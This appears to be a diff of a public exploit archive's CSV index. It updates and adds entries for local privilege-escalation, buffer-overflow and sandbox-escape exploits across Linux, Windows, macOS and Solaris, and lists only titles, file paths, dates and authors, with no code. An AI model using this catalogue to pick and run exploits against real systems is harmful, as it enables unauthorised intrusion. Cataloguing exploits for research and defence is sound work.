 4460,exploits/linux_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,linux_x86-64,
 4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris,
 4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris,
-4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass",2007-10-11,shinnai,local,windows,
+4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / disable_functions Bypass",2007-10-11,shinnai,local,windows,
 4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows,
-4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / Disable Functions Bypass",2007-10-22,shinnai,local,windows,
+4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / disable_functions Bypass",2007-10-22,shinnai,local,windows,
 4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple,
 4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple,
 4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple,
@@ -7229,7 +7558,7 @@ id,file,description,date,author,type,platform,port
 9540,exploits/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,local,windows,
 9542,exploits/linux_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",local,linux_x86,
 9543,exploits/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",local,linux,
-9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon Valle",local,linux,
+9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon de C Valle",local,linux,
 9548,exploits/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows,
 9550,exploits/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows,
 9551,exploits/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)",2009-08-31,mr_me,local,windows,
@@ -7243,7 +7572,7 @@ id,file,description,date,author,type,platform,port
 9581,exploits/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,local,windows,
 9589,exploits/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,local,windows,
 9595,exploits/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",local,linux,
-9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon Valle",local,linux,
+9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon de C Valle",local,linux,
 9608,exploits/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",local,linux,
 9610,exploits/windows/local/9610.py,"Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)",2009-09-09,blake,local,windows,
 9618,exploits/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows,
@@ -7251,7 +7580,7 @@ id,file,description,date,author,type,platform,port
 9624,exploits/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,local,windows,
 9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux,
 9628,exploits/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,local,windows,
-9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon Valle",local,linux,
+9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon de C Valle",local,linux,
 9645,exploits/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",local,aix,
 9655,exploits/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,local,windows,
 9659,exploits/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow",2009-09-14,"fl0 fl0w",local,windows,
@@ -8914,7 +9243,7 @@ id,file,description,date,author,type,platform,port
 24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows,
 24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows,
 24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux,
-24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco,
+24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon de C Valle",local,sco,
 24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix,
 24366,exploits/windows/local/24366.rb,"Microsoft Windows - Manage Memory Payload Injection (Metasploit)",2013-01-25,Metasploit,local,windows,
 24374,exploits/windows/local/24374.c,"Ipswitch IMail Server 7/8 - Weak Password Encryption",1999-12-20,Adik,local,windows,
@@ -9218,6 +9547,7 @@ id,file,description,date,author,type,platform,port
 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,
 32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux,
 32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities",2008-10-21,"Flavio D. Garcia",local,multiple,
+46639,exploits/windows/local/46639.py,"AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)",2019-04-03,"Peyman Forouzan",local,windows,
 32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation",2008-11-07,alex,local,windows,
 32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows,
 32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows,
@@ -9910,7 +10240,7 @@ id,file,description,date,author,type,platform,port
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,
 41971,exploits/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,local,windows,
 41973,exploits/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",local,linux,
-41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,
+41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,
 41995,exploits/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",local,linux,
 41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",local,linux,
 42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",local,windows,
@@ -10288,7 +10618,7 @@ id,file,description,date,author,type,platform,port
 45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
 45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,
 45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos,
-45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
+45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
 45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
@@ -10301,7 +10631,7 @@ id,file,description,date,author,type,platform,port
 45915,exploits/linux/local/45915.rb,"Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux,
 45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos,
 45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows,
-45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
+45922,exploits/multiple/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,multiple,
 45938,exploits/aix/local/45938.pl,"Xorg X11 Server (AIX) - Local Privilege Escalation",2018-12-04,0xdono,local,aix,
 45953,exploits/unix/local/45953.rb,"Emacs - movemail Privilege Escalation (Metasploit)",2018-12-04,Metasploit,local,unix,
 45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
@@ -10329,7 +10659,7 @@ id,file,description,date,author,type,platform,port
 46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
 46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,
 46120,exploits/windows/local/46120.py,"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)",2019-01-11,bzyo,local,windows,
-46142,exploits/solaris/local/46142.sh,"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)",2019-01-14,"Marco Ivaldi",local,solaris,
+46142,exploits/solaris/local/46142.sh,"xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation",2019-01-14,"Marco Ivaldi",local,solaris,
 46155,exploits/windows/local/46155.c,"Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation",2019-01-14,"Parvez Anwar",local,windows,
 46156,exploits/windows/local/46156.txt,"Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46157,exploits/windows/local/46157.txt,"Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
@@ -10356,7 +10686,7 @@ id,file,description,date,author,type,platform,port
 46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
 46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
 46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
-46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
+46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
 46335,exploits/windows/local/46335.py,"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)",2019-02-11,Achilles,local,windows,
 46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
 46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
@@ -10384,7 +10714,316 @@ id,file,description,date,author,type,platform,port
 46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
 46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
 46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows,
-46636,exploits/windows/local/46636.py,"AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow",2019-04-02,"Peyman Forouzan",local,windows,
+46636,exploits/windows/local/46636.py,"AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter)",2019-04-02,"Peyman Forouzan",local,windows,
+46657,exploits/windows/local/46657.py,"AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)",2019-04-04,"Anurag Srivastava",local,windows,
+46660,exploits/windows/local/46660.py,"AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow",2019-04-05,"Peyman Forouzan",local,windows,
+46665,exploits/windows/local/46665.py,"FlexHEX 2.71 - SEH Buffer Overflow (Unicode)",2019-04-08,"Chris Au",local,windows,
+46668,exploits/windows/local/46668.py,"AllPlayer 7.4 - SEH Buffer Overflow (Unicode)",2019-04-08,"Chris Au",local,windows,
+46670,exploits/windows/local/46670.py,"River Past Cam Do 3.7.6 - 'Activation Code' Local Buffer Overflow",2019-04-08,"Chris Au",local,windows,
+46673,exploits/windows/local/46673.py,"Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow",2019-04-08,"Peyman Forouzan",local,windows,
+46676,exploits/linux/local/46676.php,"Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation",2019-04-08,cfreal,local,linux,
+46683,exploits/windows/local/46683.txt,"Microsoft Windows - AppX Deployment Service Privilege Escalation",2019-04-09,"Nabeel Ahmed",local,windows,
+46685,exploits/windows/local/46685.py,"FTPShell Server 6.83 - 'Account name to ban' Local Buffer",2019-04-10,"Dino Covotsos",local,windows,
+46686,exploits/windows/local/46686.py,"FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer",2019-04-10,"Dino Covotsos",local,windows,
+46688,exploits/windows/local/46688.txt,"CyberArk EPM 10.2.1.603 - Security Restrictions Bypass",2019-04-12,"Alpcan Onaran",local,windows,
+46690,exploits/windows/local/46690.txt,"Microsoft Internet Explorer 11 - XML External Entity Injection",2019-04-12,hyp3rlinx,local,windows,
+46692,exploits/windows/local/46692.rb,"Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)",2019-04-12,Metasploit,local,windows,
+46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,
+46707,exploits/windows/local/46707.txt,"Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation",2019-04-16,"Digital Interruption",local,windows,
+46712,exploits/windows/local/46712.txt,"Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46713,exploits/windows/local/46713.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46714,exploits/windows/local/46714.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46715,exploits/windows/local/46715.txt,"Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46716,exploits/windows/local/46716.txt,"Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass",2019-04-16,"Google Security Research",local,windows,
+46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
+46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
+46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
+46742,exploits/windows/local/46742.txt,"Ross Video DashBoard 8.5.1 - Insecure Permissions",2019-04-23,LiquidWorm,local,windows,
+46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,
+46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
+46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
+46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
+46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
+46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
+46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
+46863,exploits/windows/local/46863.txt,"Iperius Backup 6.1.0 - Privilege Escalation",2019-05-17,bzyo,local,windows,
+46980,exploits/windows/local/46980.py,"ProShow 9.0.3797 - Local Privilege Escalation",2019-06-11,Yonatan_Correa,local,windows,
+46851,exploits/windows/local/46851.txt,"VMware Workstation 15.1.0 - DLL Hijacking",2019-05-16,"Miguel Mendez Z. & Claudio Cortes C.",local,windows,
+46854,exploits/windows/local/46854.py,"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-16,"Connor McGarr",local,windows,
+46866,exploits/windows/local/46866.c,"Huawei eSpace 1.1.11.103 - DLL Hijacking",2019-05-20,LiquidWorm,local,windows,
+46877,exploits/solaris/local/46877.c,"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation",2019-05-20,"Marco Ivaldi",local,solaris,
+46878,exploits/solaris/local/46878.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",2019-05-20,"Marco Ivaldi",local,solaris,
+46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris,
+47147,exploits/linux/local/47147.txt,"Docker - Container Escape",2019-07-19,dominikczarnotatob,local,linux,
+46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,
+46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows,
+46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
+46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
+46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows,
+46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
+46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
+46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows,
+46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows,
+46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows,
+46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,
+46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux,
+46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
+46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux,
+46988,exploits/windows/local/46988.txt,"Pronestor Health Monitoring < 8.1.11.0  - Privilege Escalation",2019-06-13,PovlTekstTV,local,windows,
+46989,exploits/linux/local/46989.sh,"CentOS 7.6 - 'ptrace_scope' Privilege Escalation",2019-06-14,s4vitar,local,linux,
+46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows,
+46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux,
+46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows,
+47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)",2019-06-18,"Guy Levin",local,linux,
+47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
+47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
+47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
+47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
+47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
+47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
+47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
+47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
+47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
+47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
+47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux,
+47134,exploits/windows/local/47134.rb,"Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)",2019-07-17,Metasploit,local,windows,
+47135,exploits/windows/local/47135.txt,"Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation",2019-07-18,"Google Security Research",local,windows,
+47149,exploits/linux/local/47149.txt,"Comtrend-AR-5310 - Restricted Shell Escape",2019-07-22,"AMRI Amine",local,linux,
+47163,exploits/linux/local/47163.c,"Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation",2019-07-24,bcoles,local,linux,
+47164,exploits/linux/local/47164.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)",2018-11-21,bcoles,local,linux,
+47165,exploits/linux/local/47165.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)",2019-01-04,bcoles,local,linux,
+47166,exploits/linux/local/47166.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)",2018-11-21,bcoles,local,linux,
+47167,exploits/linux/local/47167.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)",2019-01-04,bcoles,local,linux,
+47168,exploits/linux/local/47168.c,"Linux Kernel 4.8.0-34 < 4.8.0-45  (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation",2018-12-29,bcoles,local,linux,
+47169,exploits/linux/local/47169.c,"Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)",2018-12-29,bcoles,local,linux,
+47170,exploits/linux/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,linux,
+47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple,
+47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,
+47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,
